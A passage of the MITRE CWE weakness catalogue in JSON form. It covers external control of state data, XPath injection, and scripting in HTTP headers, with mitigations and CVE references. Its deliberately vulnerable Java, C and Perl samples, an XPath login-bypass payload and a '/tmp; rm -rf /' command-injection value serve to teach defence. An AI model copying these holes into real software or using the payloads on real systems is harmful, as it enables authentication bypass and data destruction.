Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Filtering of File and Other Resource Names for Executable Content","attr":{"@_Date":"2010-06-21"}}}},"642":{"attr":{"@_ID":"642","@_Name":"External Control of Critical State Data","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors.","Extended_Description":{"xhtml:p":["If an attacker can modify the state information without detection, then it could be used to perform unauthorized actions or access unexpected resources, since the application programmer does not expect that the state can be changed.","State information can be stored in various locations such as a cookie, in a hidden web form field, input parameter or argument, an environment variable, a database record, within a settings file, etc. All of these locations have the potential to be modified by an attacker. When this state information is used to control security or determine resource usage, then it may create a vulnerability. For example, an application may perform authentication, then save the state in an \\"authenticated=true\\" cookie. An attacker may simply create this cookie in order to bypass the authentication."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could potentially modify the state in malicious ways. If the state is related to the privileges or level of authentication that the user has, then state modification might allow the user to bypass authentication or elevate privileges."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The state variables may contain sensitive information that should not be known by the client."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"By modifying state variables, the attacker could violate the application\'s expectations for the contents of the state, leading to a denial of service due to an unexpected error condition."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Understand all the potential locations that are accessible to attackers. For example, some programmers assume that cookies and hidden form fields cannot be modified by an attacker, or they may not consider that environment variables can be modified before a privileged program is invoked."},{"attr":{"@_Mitigation_ID":"MIT-14"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store state information and sensitive data on the server side only.","Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions.","If information must be stored on the client, do not do so without encryption and integrity checking, or otherwise having a mechanism on the server side to catch tampering. Use a message authentication code (MAC) algorithm, such as Hash Message Authentication Code (HMAC) [REF-529]. Apply this against the state or sensitive data that you has to be exposed, which can guarantee the integrity of the data - i.e., that the data has not been modified. Ensure that a strong hash function is used (CWE-328)."]}},{"Phase":"Architecture and Design","Description":"Store state information on the server side only. Ensure that the system definitively and unambiguously keeps track of its own state and user state and has rules defined for legitimate state transitions. Do not allow any application user to affect state directly in any way other than through legitimate actions leading to state transitions."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","With a stateless protocol such as HTTP, use some frameworks can maintain the state for you.","Examples include ASP.NET View State and the OWASP ESAPI Session Management feature.","Be careful of language features that provide state support, since these might be provided as a convenience to the programmer and may not be considering security."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-67"},"Intro_Text":"This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define DIR \\"/restricted/directory\\"char cmd[500];sprintf(cmd, \\"ls -l %480s\\", DIR);RaisePrivileges(...);system(cmd);DropPrivileges(...);...","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Raise privileges to those needed for accessing DIR. */"}},{"attr":{"@_Nature":"attack"},"xhtml:ul":{"xhtml:li":["The user sets the PATH to reference a directory under the attacker\'s control, such as \\"/my/dir/\\".","The attacker creates a malicious program called \\"ls\\", and puts that program in /my/dir","The user executes the program.","When system() is executed, the shell consults the PATH to find the ls program","The program finds the attacker\'s malicious program, \\"/my/dir/ls\\". It doesn\'t find \\"/bin/ls\\" because PATH does not contain \\"/bin/\\".","The program executes the attacker\'s malicious program with the raised privileges."]}}],"Body_Text":["This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can\'t control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges.","However, because the program does not modify the PATH environment variable, the following attack would work:"]},{"Intro_Text":"The following code segment implements a basic server that uses the \\"ls\\" program to perform a directory listing of the directory that is listed in the \\"HOMEDIR\\" environment variable. The code intends to allow the user to specify an alternate \\"LANG\\" environment variable. This causes \\"ls\\" to customize its output based on a given language, which is an important capability when supporting internationalization.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$ENV{\\"HOMEDIR\\"} = \\"/home/mydir/public/\\";my $stream = AcceptUntrustedInputStream();while (&lt;$stream&gt;) {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"chomp;if (/^ENV ([\\\\w\\\\_]+) (.*)/) {}elsif (/^QUIT/) { ... }elsif (/^LIST/) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$ENV{$1} = $2;","attr":{"@_style":"margin-left:10px;"}},{"#text":"open($fh, \\"/bin/ls -l $ENV{HOMEDIR}|\\");while (&lt;$fh&gt;) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"SendOutput($stream, \\"FILEINFO: $_\\");","attr":{"@_style":"margin-left:10px;"}}}]}}}},"Body_Text":["The programmer takes care to call a specific \\"ls\\" program and sets the HOMEDIR to a fixed value. However, an attacker can use a command such as \\"ENV HOMEDIR /secret/directory\\" to specify an alternate directory, enabling a path traversal attack (CWE-22). At the same time, other attacks are enabled as well, such as OS command injection (CWE-78) by setting HOMEDIR to a value such as \\"/tmp; rm -rf /\\". In this case, the programmer never intends for HOMEDIR to be modified, so input validation for HOMEDIR is not the solution. A partial solution would be an allowlist that only allows the LANG variable to be specified in the ENV command. Alternately, assuming this is an authenticated user, the language could be stored in a local file so that no ENV command at all would be needed.","While this example may not appear realistic, this type of problem shows up in code fairly frequently. See CVE-1999-0073 in the observed examples for a real-world example with similar behaviors."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2428","Description":"Mail client stores password hashes for unrelated accounts in a hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2428"},{"Reference":"CVE-2008-0306","Description":"Privileged program trusts user-specified environment variable to modify critical configuration settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0306"},{"Reference":"CVE-1999-0073","Description":"Telnet daemon allows remote clients to specify critical environment variables for the server, leading to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0073"},{"Reference":"CVE-2007-4432","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4432"},{"Reference":"CVE-2006-7191","Description":"Untrusted search path vulnerability through modified LD_LIBRARY_PATH environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7191"},{"Reference":"CVE-2008-5738","Description":"Calendar application allows bypass of authentication by setting a certain cookie value to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5738"},{"Reference":"CVE-2008-5642","Description":"Setting of a language preference in a cookie enables path traversal attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5642"},{"Reference":"CVE-2008-5125","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5125"},{"Reference":"CVE-2008-5065","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5065"},{"Reference":"CVE-2008-4752","Description":"Application allows admin privileges by setting a cookie value to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4752"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2008-1319","Description":"Server allows client to specify the search path, which can be modified to point to a program that the client has uploaded.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1319"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-528"}},{"attr":{"@_External_Reference_ID":"REF-529"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form&#xA;                  Fields.&#34; Page 75"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Relevant_Properties, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Insufficient Management of User State","attr":{"@_Date":"2008-04-11"}},{"#text":"External Control of User State Data","attr":{"@_Date":"2009-01-12"}}]}},"643":{"attr":{"@_ID":"643","@_Name":"Improper Neutralization of Data within XPath Expressions (\'XPath Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.","Extended_Description":"The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"91","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Controlling application flow (e.g. bypassing authentication)."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The attacker could read restricted XML content."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use parameterized XPath queries (e.g. using XQuery). This will help ensure separation between data plane and control plane."},{"Phase":"Implementation","Description":"Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XPath queries is safe in that context."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following simple XML document that stores authentication information and a snippet of Java code that uses XPath query to retrieve authentication information:","Example_Code":[{"attr":{"@_Nature":"informative","@_Language":"XML"},"xhtml:div":{"#text":"&lt;users&gt;&lt;/users&gt;","xhtml:div":{"#text":"&lt;user&gt;&lt;/user&gt;&lt;user&gt;&lt;/user&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;login&gt;john&lt;/login&gt;&lt;password&gt;abracadabra&lt;/password&gt;&lt;home_dir&gt;/home/john&lt;/home_dir&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"&lt;login&gt;cbc&lt;/login&gt;&lt;password&gt;1mgr8&lt;/password&gt;&lt;home_dir&gt;/home/cbc&lt;/home_dir&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"XPath xpath = XPathFactory.newInstance().newXPath();XPathExpression xlogin = xpath.compile(\\"//users/user[login/text()=\'\\" + login.getUserName() + \\"\' and password/text() = \'\\" + login.getPassword() + \\"\']/home_dir/text()\\");Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new File(\\"db.xml\\"));String homedir = xlogin.evaluate(d);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"//users/user[login/text()=\'john\' or \'\'=\'\' and password/text() = \'\' or \'\'=\'\']/home_dir/text()"}],"Body_Text":["The Java code used to retrieve the home directory based on the provided credentials is:","Assume that user \\"john\\" wishes to leverage XPath Injection and login without a valid password. By providing a username \\"john\\" and password \\"\' or \'\'=\'\\" the XPath expression now becomes","which, of course, lets user \\"john\\" login without a valid password, thus bypassing authentication."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":39,"Entry_Name":"XPath Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-531"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;XPath Injection&#34;, Page 1070"}}]},"Notes":{"Note":{"#text":"This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unsafe Treatment of XPath Input","attr":{"@_Date":"2008-10-14"}},{"#text":"Failure to Sanitize Data within XPath Expressions (aka \'XPath injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data within XPath Expressions (\'XPath injection\')","attr":{"@_Date":"2010-04-05"}}]}},"644":{"attr":{"@_ID":"644","@_Name":"Improper Neutralization of HTTP Headers for Scripting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.","Extended_Description":{"xhtml:p":["An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled.","If an application does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client\'s browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Run arbitrary code."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers may be able to obtain sensitive information."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header."},{"Phase":"Architecture and Design","Description":"Disable script execution functionality in the clients\' browser."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, user-controlled data is added to the HTTP headers and returned to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addHeader(HEADER_NAME, untrustedRawInputData);"}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-3918","Description":"Web server does not remove the Expect header from an HTTP request when it is reflected back in an error message, allowing a Flash SWF file to perform XSS attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Insufficient Filtering of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of HTTP Headers for Scripting Syntax","attr":{"@_Date":"2010-04-05"}}]}},"645":{"attr":{"@_ID":"645","@_Name":"Overly Restrictive Account Lockout Mechanism","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out.","Extended_Description":"Account lockout is a security feature often present in applications as a countermeasure to the brute force attack on the password based authentication mechanism of the system. After a certain number of failed login attempts, the users\' account may be disabled for a certain period of time or until it is unlocked by an administrator. Other security events may also possibly trigger account lockout. However, an attacker may use this very security feature to deny service to legitimate system users. It is therefore important to ensure that the account lockout security mechanism is not overly 